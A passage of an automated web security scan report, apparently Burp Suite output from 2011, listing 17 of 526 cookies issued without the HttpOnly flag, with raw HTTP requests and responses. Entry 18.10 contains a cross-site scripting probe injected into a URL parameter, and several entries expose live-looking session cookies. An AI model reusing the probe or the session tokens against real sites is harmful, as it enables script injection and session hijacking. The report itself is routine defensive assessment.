Set-Cookie: TSI=lsgdamrpaddiv88ogrb60v3bq3; path=/; domain=www.trustedid.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: promoRefCode=NXDIRSUZIDPANN; expires=Tue, 24-May-2011 03:12:19 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: refCode=deleted; expires=Sat, 24-Apr-2010 03:12:18 GMT; path=/; domain=.trustedid.com; secure
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 12420

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Identity Theft Protection from Suze Orman</title>
<meta content=
...[SNIP]...

18. Cookie without HttpOnly flag set  previous  next
There are 526 instances of this issue:


18.1. http://ads.adxpose.com/ads/ads.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289668 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5E86DC9CC3BD60FE3A06221325A71F08; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 12:29:25 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...

18.2. http://affiliate.idgtracker.com/rd/r.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://affiliate.idgtracker.com
Path:   /rd/r.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rd/r.php?sid=13&pub=300009&c1=id4%20106163471CD1&c2=CD1 HTTP/1.1
Host: affiliate.idgtracker.com
Proxy-Connection: keep-alive
Referer: http://partners.nextadnetwork.com/z/371/CD1/id4+106163471
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:09:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=g7dpq2uc614mccbr73j7na1id6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR STP COM", policyref="/w3c/p3p.xml"
Set-Cookie: test=test
Location: http://affiliate.idgtracker.com/rd/r.php?sid=13&pub=300009&c1=id4%20106163471CD1&c2=CD1&cenhp1=1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


18.3. http://audience.sysomos.com/track/p  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://audience.sysomos.com
Path:   /track/p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /track/p?site=129ec802b320a9fce728bd35f466d3b0&ps=&ref= HTTP/1.1
Host: audience.sysomos.com
Proxy-Connection: keep-alive
Referer: http://hillandknowlton.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=55320D928F6BF69FE56E4A1394C6ECF3; sysVisID=1303693037741_975564360

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:36:17 GMT
Set-Cookie: JSESSIONID=9F1ED55C813DC9B3676368AC44E24709; Path=/track
Cache-Control: no-cache
Content-Type: text/plain; charset=UTF-8
Connection: close
Content-Length: 1



18.4. http://audience.sysomos.com/track/t  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://audience.sysomos.com
Path:   /track/t

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track/t?site=129ec802b320a9fce728bd35f466d3b0 HTTP/1.1
Host: audience.sysomos.com
Proxy-Connection: keep-alive
Referer: http://hillandknowlton.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:36:16 GMT
Set-Cookie: JSESSIONID=21D4DC0CEDCD773DCF040ED8138C597F; Path=/track
Set-Cookie: sysVisID=1303695376050_798279223; Expires=Sat, 23-Apr-2016 01:36:16 GMT
Cache-Control: max-age=3600
Expires: Mon, 25 Apr 2011 02:36:16 GMT
Content-Type: text/javascript
Connection: close
Content-Length: 33848

eval("\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x76\x61\x72\x20\x64\x3d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x67\x29\x7b\x76\x61\x72\x20\x68\x3d\x77\x69\x6e\x64\x6f\x77\x2e\x6f\x6e\x6c\x6f\x61\x
...[SNIP]...

18.5. https://cam.infusionsoft.com/cart/process  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://cam.infusionsoft.com
Path:   /cart/process

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart/process?packageCode=standard&affiliate=0 HTTP/1.1
Host: cam.infusionsoft.com
Connection: keep-alive
Referer: http://www.infusionsoft.com/pricing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.5.10.1303693620

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C137FB5113EEA15E639C83767C422E04; Path=/; Secure
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Date: Mon, 25 Apr 2011 01:40:09 GMT
Content-Length: 33219

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
                       "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Infusionsoft - Purchase Infusionsoft</title>
<link rel="stylesheet" href="http
...[SNIP]...

18.6. https://cam.infusionsoft.com/cart/purchase  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://cam.infusionsoft.com
Path:   /cart/purchase

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart/purchase HTTP/1.1
Host: cam.infusionsoft.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; JSESSIONID=A4215DE137CDBD905410D00F870D2667; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FE830B0B251F8F6E90E35B3648DF48C8; Path=/; Secure
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 8145
Date: Mon, 25 Apr 2011 01:46:25 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
                       "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Infusionsoft - Purchase Infusionsoft</title>
<link rel="stylesheet" href="http
...[SNIP]...

18.7. http://chat.livechatinc.net/licence/1028624/script.cgi  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://chat.livechatinc.net
Path:   /licence/1028624/script.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licence/1028624/script.cgi?lang=en&groups=0 HTTP/1.1
Host: chat.livechatinc.net
Proxy-Connection: keep-alive
Referer: http://krypt.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-type: application/x-javascript;
Set-Cookie: lc_session=S1303662876.6a6345f885&lc_last_visit=1303662876&lc_visit_number=1&lc_page_view=1&lc_nick=$&lc_chat_number=0&lc_all_invitation=0&lc_ok_invitation=0&lc_last_operator_id=$&lc_client_version=$&lc_last_conference_id=$&lc_lang=en; expires=Tue, 23-Apr-2013 18:34:36 GMT; path=/licence/1028624; domain=chat.livechatinc.net;
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 12324
Connection: Keep-Alive

if(typeof __lc_loaded=='undefined'){var __lc_loaded=true;eval((function(s){var a,c,e,i,j,o="",r,t=".......................@`~";for(i=0;i<s.length;i++){r=t+s[i][2];a=s[i][1].split(".");for(j=a.length
...[SNIP]...

18.8. http://content.truecredit.com/sites/entry/assets/javascript/campaign.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://content.truecredit.com
Path:   /sites/entry/assets/javascript/campaign.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/entry/assets/javascript/campaign.js HTTP/1.1
Host: content.truecredit.com
Proxy-Connection: keep-alive
Referer: http://www.truecredit.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1303674501185%7C1306266501185%3B%20s_vnum%3D1306266408564%2526vn%253D2%7C1306266408564%3B%20s_visit%3D1%7C1303680178921%3B%20s_depth%3D1%7C1303680178926%3B%20dfa_cookie%3Dtuitruecredit%7C1303680178936%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674496801'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674498602'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674501180'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678375845'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678378941'%255D%255D%7C1461531178941%3B%20s_invisit%3Dtrue%7C1303680178950%3B%20s_lv%3D1303678378956%7C1398286378956%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303680178956%3B%20s_pv%3Dtc%253ALogin%2520%253A%2520Return%2520User%2520Login%7C1303680178964%3B

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:34:24 GMT
Server: Apache
Set-Cookie: JSESSIONID=05010629AC46D8F8A18F9FE36E312223; Path=/
ETag: W/"1328-1302735406000"
Last-Modified: Wed, 13 Apr 2011 22:56:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 1328

function getParams() {
var vars = [], hash;
var hashes = window.location.href.slice(window.location.href.indexOf('?') + 1).split('&');
for(var i = 0; i < hashes.length; i++) {
hash
...[SNIP]...

18.9. http://controlcase.com/antispam.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://controlcase.com
Path:   /antispam.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /antispam.php HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: controlcase.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:06:06 GMT
Server: Apache/2.0.55 (Win32)
Set-Cookie: PHPSESSID=8c478c755916abba370f3111faa25cb8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5757
Content-Type: image/jpeg

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

18.10. http://controlcase.com/contact.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://controlcase.com
Path:   /contact.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact.php?subject=%22%20onmouseover%3dprompt%28902860%29%20bad%3d%22 HTTP/1.1
Host: controlcase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:10:48 GMT
Server: Apache/2.0.55 (Win32)
Set-Cookie: PHPSESSID=f4e32632d6876ee0c484114c587ffc35; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 22221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

18.11. http://converseon.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://converseon.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?utm_source=google&utm_medium=ppc&utm_campaign=listening&gclid=CMmbouS1tqgCFYNo5Qod7FADDw HTTP/1.1
Host: converseon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: SESSe1469ec4406ba2c67f2d48b94de6dc4e=fe692229cb21ffdc9f63abb9ca71ad57; expires=Wed, 18-May-2011 04:08:38 GMT; path=/; domain=.converseon.com
Last-Modified: Mon, 25 Apr 2011 00:33:52 GMT
ETag: "a57163b63c08ab6da26b1a84650430c1"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 14576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...

18.12. http://creditchecktotal.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://creditchecktotal.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: creditchecktotal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=htva5r45owtu2i45gskovg45; path=/
Set-Cookie: MachineName=IRC-P2WEB-10; domain=creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: OriginalReferrer=; domain=creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=Default; domain=creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 1:45:15 PM; domain=creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=; domain=creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NumTrialDaysLeft=; domain=creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: UID=048be8fcb9b44f4f9bcbbe780d88ea29; domain=creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: BIGipServercreditchecktotal-web-pool=175001098.22559.0000; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: http://www.creditchecktotal.com/Default.aspx
Content-Type: text/html; charset=utf-8
Date: Sun, 24 Apr 2011 20:45:15 GMT
ETag: "pv2149a0497002bf69de1ea352bc74abce"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70584.RA0.G11456.UA9421B88].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 9181

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           CreditCheck(R) Total
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <met
...[SNIP]...

18.13. http://dg.specificclick.net/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://dg.specificclick.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?y=3&t=h&u=http%3A%2F%2Fwww.neudesicmediagroup.com%2FAdvertising.aspx%3Fsite%3DSilverlight&r= HTTP/1.1
Host: dg.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7e-J^1^1; ug=wJ6hSWn821G3dA; smdmp=7e-J:811200901; adf=7e-J^0^0

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=83adbd28d8ba1db9babff0e4ebc6; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 24 Apr 2011 15:57:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 569

<html><body> <script> var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = docume
...[SNIP]...

18.14. http://echomail.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://echomail.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: echomail.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24626
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQTTABCB=MJLNDKCCDLGKAJKBMBCFBBFG; path=/
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 01:30:21 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <title>EchoMail - E-Mail & Social Media Marketing, Monitoring and Management</title>
   <head profile="http://www.w3
...[SNIP]...

18.15. http://engine03.echomail.com/icomee-regs/trial/MonitoringTrial.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://engine03.echomail.com
Path:   /icomee-regs/trial/MonitoringTrial.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icomee-regs/trial/MonitoringTrial.jsp?m=2 HTTP/1.1
Host: engine03.echomail.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F4978EDED768B0F757D9681D37B31DEC; Path=/icomee-regs
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Mon, 25 Apr 2011 00:38:30 GMT
Content-Length: 20313


<script src="/icomee-regs/js/common.js"></script>
<script src="/icomee-regs/js/uitags.js"></script>
<script src="/icomee-regs/js/validation.js"></script>
<sc
...[SNIP]...

18.16. http://engine03.echomail.com/icomee-regs/trial/QuickTrial.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://engine03.echomail.com
Path:   /icomee-regs/trial/QuickTrial.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icomee-regs/trial/QuickTrial.jsp HTTP/1.1
Host: engine03.echomail.com
Proxy-Connection: keep-alive
Referer: http://echomail.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FEEE9E501044CA2B9A9053B24A6194EF; __utmz=20441063.1303692234.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=20441063.944278103.1303692234.1303692234.1303692234.1; __utmc=20441063; __utmb=20441063.1.10.1303692234

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1178E5254F4BFB0F488F2741F483DA67; Path=/icomee-regs
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Mon, 25 Apr 2011 01:30:22 GMT
Content-Length: 21295


<script src="/icomee-regs/js/common.js"></script>
<script src="/icomee-regs/js/uitags.js"></script>
<script src="/icomee-regs/js/validation.js"></script>
<sc
...[SNIP]...

18.17. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

